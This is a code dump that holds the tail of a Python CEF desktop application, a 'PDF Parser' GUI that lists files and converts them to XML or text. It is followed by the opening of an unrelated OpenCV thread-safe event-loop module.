scale3d(1, 1, 1); margin-top: 1.5em;}
.about-title .ico { width: 4rem; height: 4rem; }
span.about-version { text-align: center; width: 100%; margin: 0 auto;
margin-bottom: .25rem; font-size: 1.6rem; font-weight: 200; display: flex;
flex-grow: 1; flex-direction: column-reverse; }
span.about-title:hover { transform: scale3d(1.1, 1.1, 1.1); transition: .2s
all ease-in-out; text-shadow: 2px 2px 0px #F3F3F2, 4px 4px 2px rgba(164,
177, 182, 0.6); }
::-webkit-scrollbar { height: 14px; width: 14px; border-color: #F3F3F2; }
::-webkit-scrollbar-thumb { background-clip: padding-box; border-radius: 7px;
border-color: #F3F3F2; background-color: rgba(66, 66, 66, 0.8); border-style:
solid; border-width: 3px; } ::-webkit-scrollbar-track { background-clip:
padding-box; border-radius: 8px; border-color: #F3F3F2; background-color:
rgba(66, 66, 66, .12); border-style: solid; border-width: 2px; }
::-webkit-scrollbar-track { border-width: initial }
::-webkit-scrollbar-corner { background-color: transparent }
.list::-webkit-scrollbar { height: 14px; width: 14px; border-color: #1E1E21; }
.list::-webkit-scrollbar-thumb { background-clip: padding-box; border-radius: 7px;
border-color: #1E1E21; background-color: #c2c5c9; border-style:
solid; border-width: 3px; }
.list::-webkit-scrollbar-track { background-clip:
padding-box; border-radius: 8px; border-color: #1E1E21; background-color:
#2F2F34; border-style: solid; border-width: 2px; }
.markup { font-size: 0.9375rem; word-wrap: break-word; margin: 0; padding: 0; }
pre { background: rgba(47, 47, 52, .9); display: flex; }
.markup pre { border-radius: 5px; box-sizing: border-box; font-family:
Consolas,Liberation Mono,Menlo,Courier,monospace; max-width: 90%; white-space:
pre-wrap; line-height: 1.3; user-select: text; padding: .5rem; }
code { margin: 0; padding: 0; display: flex; }
.tag .name {color: #e06c75;}
.xml { color: #abb2bf; flex-direction: column;}
.text { color: #abb2bf; flex-direction: column;}
.sub { padding-left: 1em; }
.splash { display: initial; text-align: center; bottom: 0; height:
max-content; left: 0; margin: auto; position: absolute; right: 0; top: 0;
max-width: 430px; }
.splash svg {max-height: 400px;}
.splash span {line-height: 0; font-size: 2em; color: #a4b1b6;}
.svg_t {animation-direction: alternate;animation-duration: 1.5s;animation-iteration-count: infinite;animation-name: float-landing;animation-timing-function: ease-in-out;}
.svg_l { animation-direction: alternate; animation-duration: 2s;
animation-iteration-count: infinite; animation-name: text-landing;
animation-timing-function: ease-in-out; }
@keyframes float-landing { 0% { -webkit-transform: translate3d(0,-2px,0);
transform: translate3d(0,-2px,0) }
to { -webkit-transform: translate3d(0,2px,0); transform: translate3d(0,2px,0) } }
@keyframes text-landing { 0% { opacity: 0.1; }
to { opacity: 1; } }
.t_3 { animation-delay: .4s; }
.t_2 { animation-delay: .6s; }
.panels-menu li a { padding: 0.75em 1.5em; transition: .2s all ease-in-out;
display: block; margin-bottom: .5em;}
.panels-menu li.selected{ border-left: 4px solid; border-color: #F3F3F2;
background: rgba(0,0,0,0.2); border-radius: .3rem; margin: 0 1rem;}
.reduced {transform: scale(.9) translateZ(0px); }
.grow {transform: scale(.9) translateZ(0px);opacity: 0; transition: .2s all ease-in-out; }
.animated { animation: show 0.3s 0.25s ease-in-out 1 forwards; opacity: 0;
transform: translate(4em, 0); transition: height 2s ease-in-out; overflow: hidden; max-width: 90%;}
.animated:nth-child(1) {animation-delay: .2s;}
.animated:nth-child(2) {animation-delay: .3s;}
.animated:nth-child(3) {animation-delay: .4s;}
.animated:nth-child(4) {animation-delay: .5s;}
.animated:nth-child(5) {animation-delay: .6s;}
.animated:nth-child(6) {animation-delay: .7s;}
.animated:nth-child(7) {animation-delay: .8s;}
.animated:nth-child(8) {animation-delay: .9s;}
.animated:nth-child(9) {animation-delay: 1s;}
.animated:nth-child(10) {animation-delay: 1.1s;}
.animated:nth-child(11) {animation-delay: 1.2s;}
.animated:nth-child(12) {animation-delay: 1.3s;}
.animated:nth-child(13) {animation-delay: 1.4s;}
@keyframes show { 100% { opacity: 1; transform: translate(0,0); max-width:
100%; } }
@keyframes pop { 100% { opacity: 1; transform: scale(1) translateZ(0px); max-width:
100%; } }
</style>
<script>
var XML = false;
var timeout;
var T = true;
document.onkeydown = checkKey;
function stageAll() {
var inp = document.getElementsByClassName("checkb");
for (var i = 0; i < inp.length; i++)
if (inp[i].type == "checkbox") {
if(! inp[i].checked) {
inp[i].checked = true;
addFile(inp[i].value);
}
}
}
function anyChecked() {
var inp = document.getElementsByClassName("checkb");
for (var i = 0; i < inp.length; i++)
if (inp[i].type == "checkbox")
if (inp[i].checked)
return true;
return false;
}
function js_alert(msg) {
alert(msg);
}
function flsSet(html) {
var elem = document.querySelector('#fls');
elem.innerHTML = html;
}
function flsAdd(html) {
var elem = document.querySelector('#fls');
elem.innerHTML += html;
}
function js_print(lang, event, msg) {
msg = "<b class="+lang+">"+lang+": "+event+":</b> " + msg;
console = document.getElementById("console")
console.innerHTML += "<div class=msg>"+msg+"</div>";
}
function js_callback_1(ret) {
js_print("Javascript", "html_to_data_uri", ret);
}
function js_callback_2(msg, py_callback) {
js_print("Javascript", "js_callback", msg);
py_callback("String sent from Javascript");
}
function setPane(pane) {
document.querySelector(".selected").classList.remove("selected");
document.querySelector(".l"+pane).classList.add("selected");
document.querySelector(".active").classList.remove("active");
document.querySelector("#"+pane).classList.add("active");
}
function setCount(cnt) {
document.querySelector("#fcount").innerHTML = cnt+' Items';
}
function menu() {
if(document.querySelector(".window").classList.contains('reduced')) {
//open
document.querySelector(".settings").classList.remove("visible");
} else {
document.querySelector(".settings").classList.add("visible");
}
document.querySelector(".window").classList.toggle('reduced');
}
function plop(msg) {
console = document.getElementById("console");
console.innerHTML += "<div class=msg>"+msg+"</div>";
//lol(msg);
}
function log(msg) {
console = document.getElementById("console");
console.innerHTML += "<div class=msg>"+msg+"</div>";
}
function addFile(f) {
//console = document.getElementById("console");
//console.innerHTML += "<div class=msg>"+f+"</div>";
switch_file(f);
}
function XoT() {
XML = !XML;
var elem = document.querySelector('#XoT');
elem.classList.toggle("act");
}
function parseF() {
if(anyChecked()) {
var elem = document.querySelector('#fls');
elem.innerHTML = "<h4 class='status'>Working . . .</h4>";
document.getElementById("add").disabled = true;
document.getElementById("start").disabled = true;
document.getElementById("XoT").disabled = true;
parse(js_callback_1, XML);
} else {
log('Please select at least one file.');
}
}
function resetT() {
T = true;
}
function checkKey(e) {
e = e || window.event;
if(document.activeElement.tagName == "INPUT") {
if (e.keyCode == '27') {
document.activeElement.blur();
}
} else if (document.activeElement.tagName == "BODY") {
if (e.keyCode == '38') {
// up arrow
}
else if (e.keyCode == '83') {
// s
if(T) {
if(! document.querySelector(".settings").classList.contains("visible")) {
stageAll();
T = false;
timeout = setTimeout(resetT, 750);
} else {
setPane('Struc');
T = false;
timeout = setTimeout(resetT, 300);
}
}
}
else if (e.keyCode == '82') {
// r
if(T) {
if(! document.querySelector(".settings").classList.contains("visible")) {
refresh(js_callback_1);
enable();
T = false;
timeout = setTimeout(resetT, 750);
}
}
}
else if (e.keyCode == '88') {
// x
if(T) {
if(! document.querySelector(".settings").classList.contains("visible")) {
if(! document.getElementById("XoT").disabled) XoT();
T = false;
timeout = setTimeout(resetT, 750);
}
}
}
else if (e.keyCode == '13') {
if(T) {
if(document.querySelector(".settings").classList.contains("visible")) {
save();
} else {
parseF();
}
T = false;
timeout = setTimeout(resetT, 750);
}
// Enter
}
else if (e.keyCode == '32') {
// Space
}
else if (e.keyCode == '67') {
// c
if(T) {
if(document.querySelector(".settings").classList.contains("visible")) {
setPane('Core');
T = false;
timeout = setTimeout(resetT, 300);
}
}
}
else if (e.keyCode == '75') {
// k
if(T) {
if(document.querySelector(".settings").classList.contains("visible")) {
setPane('Keys');
T = false;
timeout = setTimeout(resetT, 300);
}
}
}
else if (e.keyCode == '65') {
// a
if(T) {
if(document.querySelector(".settings").classList.contains("visible")) {
setPane('About');
T = false;
timeout = setTimeout(resetT, 300);
}
}
}
else if (e.keyCode == '84') {
// t
}
else if (e.keyCode == '27') {
if(document.querySelector(".settings").classList.contains("visible")) {
menu();
}
// Esc
}
else if (e.keyCode == '188') {
if(T) {
menu();
T = false;
timeout = setTimeout(resetT, 750)
}
// ,
}
else if (e.keyCode == '191') {
// /
}
}
}
function enable() {
document.querySelector("input[name='path']").blur();
document.querySelector("input[name='out']").blur();
document.getElementById("add").disabled = false;
document.getElementById("start").disabled = false;
document.getElementById("XoT").disabled = false;
}
window.onload = function(){
html_to_data_uri("test", js_callback_1);
};
</script>
</head>
<body>
<div class="window">
<div class="toolbar">
<button id="add" class="button" onclick="lol('btn')">
<svg class="ico" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path style="isolation:auto;mix-blend-mode:normal" fill="#303f46" d="M12 11l-1 1v9h2v-8h8v-2z" color="#000" overflow="visible"/>
<path style="isolation:auto;mix-blend-mode:normal" fill="#546e7a" d="M11 13l2-2V3h-2v8H3v2h8z" color="#000" overflow="visible"/>
</svg>
</button>
<!--button class="button" onclick="plop('btn')">plop</button-->
<button id="start" class="button" onclick="parseF()">
<svg class="ico" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path fill="#546e7a" d="M8 5l12 7-12 7z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
<path fill="#303f46" fill-rule="evenodd" d="M7 4l14 8-14 8zm1 2v12l4-6z"/>
</svg>
</button>
<button id="XoT" class="button" onclick="XoT()">
<svg class="ico" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path style="isolation:auto;mix-blend-mode:normal" fill="#546e7a" d="M5 4v1h13v7h1V4H5zm0 7v9h12v-1H6v-8H5z" color="#000" overflow="visible"/>
<path style="isolation:auto;mix-blend-mode:normal" class="b-red" fill="#303f46" d="M18.5 13l-.7.7L20 16H15v1h5.1l-2.3 2.3.7.8 2.8-2.9.7-.7-3.5-3.5z" color="#000" overflow="visible"/>
<path style="isolation:auto;mix-blend-mode:normal" fill="#546e7a" d="M10 7v1h5V7h-5zm0 2v1h3V9h-3zm-2 2v1h8v-1H8zm0 2v1h4v-1H8zm0 2v1h5v-1H8z" color="#000" overflow="visible"/>
<path style="isolation:auto;mix-blend-mode:normal" class="b-red" fill="#303f46" d="M9 10V6H3v4zM5 8L4 9V7h4v1z" color="#000" overflow="visible"/>
</svg>
</button>
<div class="sep"></div>"""
HTML_code += '<h1 class="big" id="fcount">{0} Items</h1>'.format(FCNT)
HTML_code += """<div class="left" style="
">
<button class="button" onclick="menu()">
<svg class="ico" id="bham" viewBox="0 0 24 24"><path id="mon" fill="#303f46" d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z">
</svg>
</button>
</div>
</div>
<div class="list">
<ul class="files" id="fls">"""
# Header row for the file table: Convert / Author / Year / File columns.
HTML_code += '<li class="fhead"><div class="tb-e tb1"><span>Convert</span></div><div class="tb-e"><span>Author</span></div><div class="tb-e"><span>Year</span></div><div class="tb-e tb-g"><span>File</span></div></li>'
# Empty directory listing: show the splash screen instead of rows.
if len(gl)<1:
    HTML_code += """ <div class="splash">{}<span>{}</span></div> """.format(ico_splash, _MESSAGE[2])
else:
    for g in gl:
        g_f = file_name(g)  # [basename, author, year, extra]
        # {0}=path (checkbox value / JS toggle key), {1}=basename,
        # {2}=author, {3}=year; the 5th argument (g_f[3]) is never
        # referenced by the template.
        HTML_code += """<li class="file animated"><div class="tb-e tb1"><input class="checkb" type="checkbox" name="pdfs" value="{0}" onclick="addFile('{0}')"></div>
<div class="tb-e"><span>{2}</span></div>
<div class="tb-e"><span>{3}</span></div>
<div class="tb-e tb-g"><span>{1}</span></div>
</li>""".format(g, g_f[0], g_f[1], g_f[2], g_f[3])
HTML_code += """</ul>
</div>
<div id="console"></div>
</div>
<div class="settings">
<div class="pane p0">
<ul class="panels-menu">
<li class="lCore selected"><a class="icon ico-c" onclick="setPane('Core');">Core</a></li>
<li class="lKeys"><a class="icon ico-k" onclick="setPane('Keys');">Keybind</a></li>
<li class="lStruc"><a class="icon ico-s" onclick="setPane('Struc');">Structures</a></li>
<li class="lAbout"><a class="icon ico-a" onclick="setPane('About');">About</a></li>
</ul>
</div>
<div class="pane p1">
<div class="panels-content active" id="Core">
<script>
var _path = '{0}';
var _out = '{1}';""".format(wd, outF)
HTML_code += """
function reset() {
document.querySelector("input[name='path']").value = _path;
document.querySelector("input[name='out']").value = _out;
refresh(js_callback_1);
}
function save() {
var p = document.querySelector("input[name='path']").value;
var o = document.querySelector("input[name='out']").value;
if(p != _path) {
if(o != _out) {
set(js_callback_1, p, o);
setTimeout(menu, 750);
_out = o;
} else {
set(js_callback_1, p, '');
setTimeout(menu, 750);
}
_path = p;
refresh(js_callback_1);
enable();
} else {
if(o != _out) {
set(js_callback_1, '', o);
setTimeout(menu, 750);
_out = o;
refresh(js_callback_1);
enable();
} else {
//pass
}
}
}
"""
HTML_code += """</script>
<h2 class="pane-title">Core Settings</h2>
<div class="pane-block">
<span>Change core comportement</span>
</div>
<div class="pane-block">
<h4 class="small-title">Search path</h4>
<span class="muted">Folder where source file are</span>
<input class="input-text" name="path" type="text" placeholder="path" maxlength="256" value="{0}">
</div>
<div class="pane-block">
<h4 class="small-title">Output folder</h4>
<span class="muted">Folder where files will output</span>
<input class="input-text" name="out" type="text" placeholder="path" maxlength="256" value="{1}">
</div>
<div class="pane-block fixed">
<button class="button btn btn-cancel" onClick="reset();">Cancel</button>
<button class="button btn btn-save" onClick="save();">Save</button>
</div>
</div>
<div class="panels-content" id="Keys">
<h2 class="pane-title">Keybind</h2>
<div class="pane-block">
<ul class="keys"><li class="khead"><div class="tb-e"><span>Key</span></div><div class="tb-e tb-g"><span>Action</span></div></li>""".format(wd, outF)
# One table row per keybinding (key -> action description).
for i in KBINDS:
    HTML_code += """<li class="key">
<div class="tb-e"><span>{0}</span></div>
<div class="tb-e tb-g"><span>{1}</span></div>
</li>""".format(i, KBINDS[i])
# Tag configuration pulled from the parser: which tags are enabled and
# their XML / plain-text spellings, used by the structure previews below.
DO_TAGS = parser.getDoTags()
XML_TAGS = parser.getXMLTags()
TXT_TAGS = parser.getTXTTags()
HTML_code += """</ul>
</div>
</div>
<div class="panels-content" id="Struc">
<h2 class="pane-title">Structures</h2>
<div class="pane-block">
<span>Pre-defined output</span>
</div>
<div class="pane-block">
<div class="markup">
<pre>
<code class="xml">
<span class="tag"><<span class="name">article</span>></span>
"""
# XML output preview: one nested element line per enabled tag that has
# an XML spelling.
for tag in DO_TAGS:
    if tag in XML_TAGS and DO_TAGS[tag]:
        HTML_code += """ <span class="tag sub"><<span class="name">{0}</span>> the {0} </<span class="name">{0}</span>></span>
""".format(XML_TAGS[tag])
HTML_code += """ <span class="tag"></<span class="name">article</span>></span>
</code>
</pre>
</div>
</div>
<div class="pane-block">
<div class="markup">
<pre>
<code class="text">
"""
# Plain-text output preview: marker line plus sample content for each
# enabled tag; _HEADER is emitted verbatim (stripped) with no sample.
for tag in DO_TAGS:
    if tag in TXT_TAGS and DO_TAGS[tag]:
        if(tag != '_HEADER'):
            # tag[1:] presumably drops a leading underscore from the tag
            # name for display — TODO(review): confirm tag naming scheme.
            HTML_code += """ <span class="tag"><span class="name">{0}</span></span>
<span class="tag"> the {1} </span>""".format(TXT_TAGS[tag], tag[1:].lower())
        else:
            HTML_code += """ <span class="tag"><span class="name">{0}</span></span>""".format(TXT_TAGS[tag].strip())
HTML_code += """ </code>
</pre>
</div>
</div>
</div>"""
HTML_code += """
<div class="panels-content" id="About">
<span class="about-title">
<svg class="ico" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path fill="#f3f3f2" d="M4 3v18h12l4-4V3z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="#f3f3f2" d="M2 5h8v6H2z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="#f3f3f2" d="M3 6h6v3H3z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<g fill="#bb2429">
<path fill="#a4b1b6" d="M5 4v1h13v10h-4v4H6v-8H5v9h10l4-4V4z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
</g>
<path fill="#92999c" d="M10 7v1h5V7h-5zm0 2v1h3V9h-3zm-2 2v1h8v-1H8zm0 2v1h4v-1H8zm0 2v1h5v-1H8z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="#c94f53" d="M9 10V6H3v4zM5 8L4 9V7h4v1z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
</svg>
PDF Parser</span>
<div class="pane-block">
<span class="about-version">{}</span>
</div>
<div class="pane-block">
<h4 class="small-title">Used libraries</h4>
<span class="muted">Python {}</span>
<span class="muted">Chrome {}</span>
<span class="muted">Pickle {}</span>
<span class="muted">CEF {}</span>
</div>
<div class="pane-block">
<h4 class="small-title">Team</h4>""".format(VERSION,'.'.join(['{}'.format(i) for i in sys.version_info]), cef.GetVersion()['chrome_version'], pickle.format_version, cef.GetVersion()['cef_version'])
# One line per team member in the About pane.
for i in TEAM:
    HTML_code += """<span class="muted">{}</span>""".format(i)
#<span class="muted">{}</span>
HTML_code += """</div>
</div>
</div>
<button class="button fixed" onclick="menu()">
<svg class="ico" id="bham" viewBox="0 0 24 24"><path id="mon" fill="#303f46" <path d="M6.3 5L5 6.2l5.7 5.7-5.7 5.7L6.3 19l5.7-5.7 5.7 5.7 1.4-1.4-5.7-5.7 5.7-5.7L17.7 5 12 10.6 6.3 4.9z"/>>
</path></svg>
</button>
</div>
</body>
</html>
"""
def main():
    """Application entry point: configure and run the CEF browser shell.

    Blocks in cef.MessageLoop() until all windows close, then shuts
    CEF down.
    """
    check_versions()
    sys.excepthook = cef.ExceptHook  # shut down CEF cleanly on uncaught errors
    settings = {
        "context_menu": {
            "enabled": _DEBUG,  # right-click menu only in debug builds
            "navigation": False,
            "print": False,
            "view_source": False,
            "external_browser": False,
            "devtools": True,
        },
        # "product_version": "MyProduct/10.00",
        # "user_agent": "MyAgent/20.00 MyProduct/10.00",
    }
    cef.Initialize(settings=settings)
    # The whole UI is one page, served as a base64 data: URI built from
    # the HTML_code string assembled above.
    browser = cef.CreateBrowserSync(url=html_to_data_uri(HTML_code),
                                    window_title=APP_NAME)
    #SetIcon("./res/pdf.ico")
    set_client_handlers(browser)
    set_javascript_bindings(browser)
    cef.MessageLoop()  # blocks until the browser window is closed
    cef.Shutdown()
def html_to_data_uri(html, js_callback=None):
    """Encode *html* into a base64 ``data:text/html`` URI.

    Callable from two sides:

    1. From Python (``js_callback`` omitted): the URI string is returned.
    2. From Javascript: inter-process messaging is asynchronous, so no
       value can be returned; the result would have to be delivered via
       ``js_callback.Call`` — that delivery is currently disabled, so
       nothing happens and ``None`` is returned.
    """
    raw = html.encode("utf-8", "replace")
    uri = "data:text/html;base64,{data}".format(
        data=base64.b64encode(raw).decode("utf-8", "replace"))
    if not js_callback:
        return uri
    # Javascript path: callback delivery intentionally disabled.
    #js_print(js_callback.GetFrame().GetBrowser(),
    #         "Python", "html_to_data_uri",
    #         "Called from Javascript. Will call Javascript callback now.")
    #js_callback.Call(uri)
def set_javascript_bindings(browser):
    """Expose the Python API to the page's Javascript.

    Binds the module-level functions (file staging, parsing, path
    settings), an ``external`` object, and two demo properties onto the
    page's global scope.
    """
    external = External(browser)
    bindings = cef.JavascriptBindings(
        bindToFrames=False, bindToPopups=False)
    bindings.SetProperty("python_property", "This property was set in Python")
    bindings.SetProperty("cefpython_version", cef.GetVersion())
    bindings.SetFunction("html_to_data_uri", html_to_data_uri)
    bindings.SetFunction("lol", lol)  # debug echo to stdout
    bindings.SetFunction("add_file", add_file)
    bindings.SetFunction("switch_file", switch_file)
    bindings.SetFunction("remove_file", remove_file)
    bindings.SetFunction("parse", _parse)
    bindings.SetFunction("setWD", setWD)
    bindings.SetFunction("setOut", setOut)
    bindings.SetFunction("set", set)  # the module-level `set` below (shadows builtin)
    bindings.SetFunction("refresh", _refresh)
    bindings.SetObject("external", external)
    browser.SetJavascriptBindings(bindings)
def add_file(f):
    """Stage *f* for conversion; no-op when it is already staged."""
    if f in files:
        return
    files.append(f)
def switch_file(f):
    """Toggle *f*'s membership in the staged-file list (checkbox handler)."""
    try:
        files.remove(f)
    except ValueError:
        files.append(f)
def remove_file(f):
    """Unstage *f*; silently ignores files that were never staged."""
    try:
        files.remove(f)
    except ValueError:
        pass
def clear_files():
    """Drop every staged file, emptying the shared list in place."""
    del files[:]
def setWD(wd=False):
    """Change the parser's search (working) directory.

    Parameters
    ----------
    wd : str or False
        New search path. ``False`` (the default) is a sentinel meaning
        "no path supplied".

    Returns
    -------
    bool
        ``parser.setWD``'s result, or ``False`` when no path was given.

    Side effect: clears the staged-file selection, which referred to the
    previous directory listing.
    """
    # Fix: the original tested `wd != False`, an equality comparison with
    # a bool that misbehaves for falsy non-sentinel values; use an
    # identity test against the sentinel instead.
    if wd is False:
        return False
    files.clear()
    return parser.setWD(wd)
def setOut(outf=False):
    """Change the parser's output folder.

    Parameters
    ----------
    outf : str or False
        New output path; ``False`` (the default) means "no path supplied".

    Returns
    -------
    bool
        ``parser.setOut``'s result, or ``False`` when no path was given.
    """
    # Fix: identity test against the False sentinel instead of the
    # fragile `outf != False` equality comparison.
    if outf is False:
        return False
    return parser.setOut(outf)
def set(js_callback=None, wd='', outf=''):
    # NOTE(review): shadows the builtin `set`; kept because this exact
    # name is bound into Javascript by set_javascript_bindings.
    """Apply new search/output paths coming from the settings pane.

    Empty strings mean "leave unchanged". On an invalid path an error
    line is pushed to the in-page console; on a successful search-path
    change the file list is refreshed.
    """
    #if js_callback:
    #    js_print(browser, "Python", "set", "{} {}".format(wd, outf))
    if wd != '':
        if not setWD(wd):
            if js_callback:
                browser = js_callback.GetFrame().GetBrowser()
                js_print(browser, "Python", "set", "Invalid path : {}".format(wd))
        else:
            if js_callback:
                _refresh(js_callback)
    if outf != '':
        if not setOut(outf):
            if js_callback:
                browser = js_callback.GetFrame().GetBrowser()
                js_print(browser, "Python", "set", "Out folder invalid ({}).".format(outf))
def _refresh(js_callback=None):
    """Rebuild the file-list panel from the current directory listing.

    Re-scans the search path, clears the staged selection, persists the
    config, and — when invoked from Javascript — pushes the regenerated
    HTML rows and the item count back into the page. Previously staged
    files that still exist are re-rendered with their checkbox checked
    (note: clear_files() has already emptied `files`, so `g in files` is
    only true if something re-staged them — TODO(review): confirm intent).
    """
    gl = parser.listDir()
    FCNT = len(gl)
    clear_files()
    parser.saveConfig()
    if js_callback:
        browser = js_callback.GetFrame().GetBrowser()
        file_count(browser, FCNT)
        # Table header row.
        html = '<li class="fhead"><div class="tb-e tb1"><span>Convert</span></div><div class="tb-e"><span>Author</span></div><div class="tb-e"><span>Year</span></div><div class="tb-e tb-g"><span>File</span></div></li>'
        fls_set(browser, html)
        if FCNT<1:
            # Empty directory: show the splash screen.
            html = """ <div class="splash">{}<span>{}</span></div> """.format(ico_splash, _MESSAGE[2])
            fls_add(browser, html)
        else:
            for g in gl:
                g_f = file_name(g)  # [basename, author, year, extra]
                #TODO: PARSE
                if g in files:
                    html = """<li class="file animated"><div class="tb-e tb1"><input class="checkb" type="checkbox" name="pdfs" value="{0}" onclick="addFile('{0}')" checked></div>
<div class="tb-e"><span>{2}</span></div>
<div class="tb-e"><span>{3}</span></div>
<div class="tb-e tb-g"><span>{1}</span></div>
</li>""".format(g, g_f[0], g_f[1], g_f[2], g_f[3])
                else:
                    html = """<li class="file animated"><div class="tb-e tb1"><input class="checkb" type="checkbox" name="pdfs" value="{0}" onclick="addFile('{0}')"></div>
<div class="tb-e"><span>{2}</span></div>
<div class="tb-e"><span>{3}</span></div>
<div class="tb-e tb-g"><span>{1}</span></div>
</li>""".format(g, g_f[0], g_f[1], g_f[2], g_f[3])
                fls_add(browser, html)
def _parse(js_callback=None, xml=True):
    """Convert every staged file to XML or plain text and report per-file
    status rows into the page.

    Each conversion runs on a worker thread, but ``q.get()`` blocks until
    that thread posts its output path, so files are effectively processed
    sequentially. Each status row is pushed to the page 0.5 s after its
    conversion finishes via threading.Timer.
    """
    outF = ""
    if js_callback:
        # Replace the file table with a Status / Name header.
        html = '<li class="fhead"><div class="tb-e tb1"><span>Status</span></div><div class="tb-e"><span>Name</span></div></li>'
        browser = js_callback.GetFrame().GetBrowser()
        fls_set(browser, html)
        for g in files:
            q = queue.Queue()  # receives the output path from the worker
            try:
                if xml:
                    t = threading.Thread(target=parser.fromTexttoXML, args=['{}'.format(g), q])
                else:
                    t = threading.Thread(target=parser.fromTexttoTXT, args=['{}'.format(g), q])
                t.start()
                outF = q.get()  # blocks until the worker finishes
                if(outF == ''):
                    # Conversion failed: outF is '', so the displayed name
                    # is empty too — NOTE(review): probably meant to show g.
                    html = '<li class="file animated"><div class="tb-e tb1">{}</div><div class="tb-e"><span>{}</span></div></li>'.format(ico_failed, ''.join(outF.split('/')[-1:]))
                else:
                    html = '<li class="file animated"><div class="tb-e tb1">{}</div><div class="tb-e"><span>{}</span></div></li>'.format(ico_pdf, ''.join(outF.split('/')[-1:]))
                # js_print(js_callback.GetFrame().GetBrowser(),
                #          "Parser", "file_load",
                #          "> {}".format(g))
            except:
                # NOTE(review): bare except swallows all errors from the
                # thread setup/queue; renders a failed row instead.
                html = '<li class="file animated"><div class="tb-e tb1">{}</div><div class="tb-e"><span>{}</span></div></li>'.format(ico_failed, ''.join(outF.split('/')[-1:]))
            args = [browser, html]
            threading.Timer(0.5, fls_add, args).start()
def lol(str, js_callback=None):
    """Debug helper bound into Javascript: echo *str* to stdout.

    The parameter name shadows the builtin ``str`` but is kept for
    interface stability; ``js_callback`` is accepted and ignored.
    """
    #subprocess.Popen("gnome-terminal")
    print(str)
def fls_add(browser, html):
    """Append *html* to the in-page file list (calls JS ``flsAdd``)."""
    browser.ExecuteFunction("flsAdd", html)
def fls_set(browser, html):
    """Replace the in-page file list with *html* (calls JS ``flsSet``)."""
    browser.ExecuteFunction("flsSet", html)
def file_count(browser, val):
    """Update the "N Items" counter in the toolbar (calls JS ``setCount``)."""
    browser.ExecuteFunction("setCount", val)
def js_print(browser, lang, event, msg):
    """Write a tagged message to the in-page console via JS ``js_print``."""
    browser.ExecuteFunction("js_print", lang, event, msg)
def set_client_handlers(browser):
    """Placeholder: no client handlers are installed on *browser*.

    The original wiring is kept for reference:
        for handler in (LoadHandler(), DisplayHandler()):
            browser.SetClientHandler(handler)
    """
    return None
def check_versions():
    """Startup sanity hook: query the CEF version.

    The return value is unused (the original bound it to a dead local,
    removed here); the call itself is kept so any version-lookup failure
    surfaces at startup.
    """
    cef.GetVersion()
class LoadHandler(object):
    """CEF client handler reacting to page-load state changes.

    Currently not installed anywhere (see set_client_handlers); kept
    for reference.
    """
    def OnLoadingStateChange(self, browser, is_loading, **_):
        """Called when the loading state has changed."""
        if not is_loading:
            # Loading is complete. DOM is ready.
            # js_print(browser, "Python", "OnLoadingStateChange",
            #          "Loading is complete")
            pass
class External(object):
    """Python object exposed to Javascript through CEF bindings."""

    def __init__(self, browser):
        # Keep a handle on the owning browser for use by callbacks.
        self.browser = browser

    def test_multiple_callbacks(self, js_callback):
        """Test both javascript and python callbacks."""

        def py_callback(msg_from_js):
            # Invoked from Javascript; route the message to the JS console.
            js_print(self.browser, "Python", "py_callback", msg_from_js)

        # Hand Javascript a string plus a Python callback it can invoke.
        js_callback.Call("String sent from Python", py_callback)
if __name__ == '__main__':
    # Script entry point: only run when executed directly, not on import.
    main()
|
cv2_eventloop.py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""OpenCV eventloop for thread-safe access to opencv GUI.
Makes it possible for multiple threads to interact with cv2 UI.
This gets rid of the problem here: https://github.com/opencv/opencv/issues/8407
Normally cv2 insists that the thread which invokes waitKey, must also be the
one to perform other UI operations such as imshow, namedWindow, etc.
This module frees the developer from ensuring it for a multi-threaded
application. Hence UI and waitKey can now be manipulated by two different,
independent, threads.
Example -
cv2e = cv2_eventloop.get_instance()
# User thread 1: Get keys.
for key in cv2e.key_iterator():
print(key)
# User thread 2: Can independently get the same keys.
for key in cv2e.key_iterator():
print(key)
# User thread 3: Can modify cv UI without blocking.
cv2e.call(cv2.namedWindow, "my window")
cv2e.stop() # To stop the event loop.
NOTE: Non UI opencv methods, e.g. image manipulation etc. are safe to be called
directly without requiring this module.
"""
import collections
import threading
from typing import Any, Callable, Deque, List, Optional, Tuple
import cv2  # type: ignore
# How long to wait on cv2.waitKey() for the main event loop.
_CV2_EVENTLOOP_MS = 100
# Key on which the event loop will stop.
_STOP_KEY = 27 # Esc
class _KeyIterator:
    """Is really an iterator that returns keys as ints.

    Used as the return type for cv2e.key_iterator().
    Iteration ends when the cv2e object stops.
    """

    def __init__(self,
                 add_key_listener: Callable[[Callable[[Optional[int]], None]],
                                            None], stop: Callable[[], None],
                 timeout: Optional[float]) -> None:
        """Create the _KeyIterator.

        Args:
          add_key_listener: the key listener, called when a key is pressed.
          stop: the stop callback, called when the loop is stopped.
          timeout: timeout for each loop of the iterator.
        """
        # Keys received from the event loop but not yet consumed by __next__.
        self._keys: Deque[int] = collections.deque()
        # Set while at least one key is queued (or the iterator has stopped).
        self._event = threading.Event()
        # Serializes producer (_on_key) and consumer (__next__) access.
        self._lock = threading.Lock()
        self._timeout = timeout
        self._stopped = False
        self._stop = stop
        # Use the passed function to add the key listener.
